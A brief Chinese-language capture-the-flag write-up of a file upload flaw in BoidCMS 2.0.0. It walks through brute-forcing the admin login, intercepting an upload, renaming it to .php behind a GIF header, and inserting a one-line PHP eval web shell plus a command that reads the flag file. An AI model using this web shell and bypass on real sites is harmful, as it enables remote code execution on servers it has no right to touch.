0x01 靶标介绍

BoidCMS v.2.0.0 存在文件上传漏洞，远程攻击者可通过添加 GIF 头部绕过 MIME 类型检查，执行任意代码。

0x02 影响范围

BoidCMS <=2.0.0

首先来到admin页面，使用bs爆破，得到账号密码

Media页面可以上传文件，尝试上传文件

文件类型不被支持，我们先上传一个正常文件

进行抓包，然后编辑重放

将文件名更改为php后缀，在文件头下面添加payload

1
2


<?php @eval($_POST['cmd']);?>  
<?php system("cat /flag");?>

刷新可以看到上传成功

回显得到flag